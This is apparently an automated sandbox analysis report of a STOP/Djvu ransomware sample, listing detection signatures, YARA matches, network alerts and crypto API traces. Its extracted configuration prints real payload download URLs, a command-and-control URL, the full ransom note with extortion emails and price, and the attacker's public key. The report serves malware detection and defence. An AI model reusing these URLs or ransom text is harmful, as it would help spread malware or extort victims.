Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Overview

General Information

Sample name:baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Analysis ID:1381448
MD5:5cacd6f1b5cec25f3f0b0b3c4d5807d3
SHA1:41b8851bc57462502b0113ee1f2579dff5d94f4f
SHA256:c73cb93ad9ad6d003b505ce2b960d75467ad612786e0559c74dca18426fb9400
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\\\ni6Rfb9WWM4K\\/vgKVvZi\\/+pA7wR6QvFBURdJ1Z9mdw8kYkafMfVuTEgbW+j4RDepy\\\\nRMc6ZcYdxsu2f4+XgrCWmwJw8wVmodWyLZqqeb1k4FONQs+uAP0AxLLTUbcAfP75\\\\ngGAW9KhqPhoYKVhzDqtFOqCvYqMylrgCNwHpTp75Bv5up3OfAE5h6+t\\/TfjQjDFJ\\\\nJY0Tgum721KiGGppZfsBDqY1Zv\\/F45h+MVk9mhfvBd3UZNJUZI5ewP1zbnOU1llz\\\\ndETA6WbQWWm4u4pamw3U0ZLnFDJQkUgOAbxOfVM4xpi0lrPyV+oTCXnpOgcF4YvU\\\\n2wIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      SourceRuleDescriptionAuthorStrings
      00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            Click to see the 39 entries
            SourceRuleDescriptionAuthorStrings
            3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
              3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
              • 0xfe888:$x1: C:\SystemID\PersonalID.txt
              • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
              • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
              • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
              • 0xfecec:$s1: " --AutoStart
              • 0xfed00:$s1: " --AutoStart
              • 0x102948:$s2: --ForNetRes
              • 0x102910:$s3: --Admin
              • 0x102d90:$s4: %username%
              • 0x102eb4:$s5: ?pid=
              • 0x102ec0:$s6: &first=true
              • 0x102ed8:$s6: &first=false
              • 0xfedf4:$s7: delself.bat
              • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
              • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
                5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
                • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
                • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
                Click to see the 25 entries
                No Sigma rule has matched
                Timestamp:192.168.2.4199.59.242.15049734802833438 01/26/24-01:36:17.138983
                SID:2833438
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4199.59.242.15049732802020826 01/26/24-01:36:00.285049
                SID:2020826
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4199.59.242.15049732802036333 01/26/24-01:36:00.285049
                SID:2036333
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeAvira: detected
                Source: http://colisumy.com/dl/build2.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/raud/get.phpURL Reputation: Label: malware
                Source: http://colisumy.com/dl/build2.exeURL Reputation: Label: malware
                Source: http://zexeq.com/raud/get.phpepURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exeURL Reputation: Label: malware
                Source: http://zexeq.com/raud/get.phpPAvira URL Cloud: Label: malware
                Source: http://colisumy.com/dl/build2.exerun00.YAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Avira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637VAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637iAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Avira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exerun8Avira URL Cloud: Label: malware
                Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windo
                Source: zexeq.comVirustotal: Detection: 20%Perma Link
                Source: colisumy.comVirustotal: Detection: 19%Perma Link
                Source: http://zexeq.com/raud/get.phpPVirustotal: Detection: 17%Perma Link
                Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Virustotal: Detection: 15%Perma Link
                Source: http://zexeq.com/files/1/build3.exerun8Virustotal: Detection: 16%Perma Link
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeReversingLabs: Detection: 86%
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeVirustotal: Detection: 76%Perma Link
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeReversingLabs: Detection: 86%
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeVirustotal: Detection: 76%Perma Link
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00481178 CryptDestroyHash,CryptReleaseContext,0_2_00481178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0047E870
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047EA51 CryptDestroyHash,CryptReleaseContext,0_2_0047EA51
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0047EAA0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047EC68 CryptDestroyHash,CryptReleaseContext,0_2_0047EC68
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00480FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00480FC0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0047E870
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0047EAA0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00480FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00480FC0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00481178 CryptDestroyHash,CryptReleaseContext,2_2_00481178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047EA51 CryptDestroyHash,CryptReleaseContext,2_2_0047EA51
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047EC68 CryptDestroyHash,CryptReleaseContext,2_2_0047EC68
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E2E870
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E2EAA0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E30FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00E30FC0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E31178 CryptDestroyHash,CryptReleaseContext,3_2_00E31178
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2EA51 CryptDestroyHash,CryptReleaseContext,3_2_00E2EA51
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2EC68 CryptDestroyHash,CryptReleaseContext,3_2_00E2EC68
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E31178 CryptDestroyHash,CryptReleaseContext,4_2_00E31178
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E2E870
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E2EAA0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2EA51 CryptDestroyHash,CryptReleaseContext,4_2_00E2EA51
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2EC68 CryptDestroyHash,CryptReleaseContext,4_2_00E2EC68
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E30FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,4_2_00E30FC0
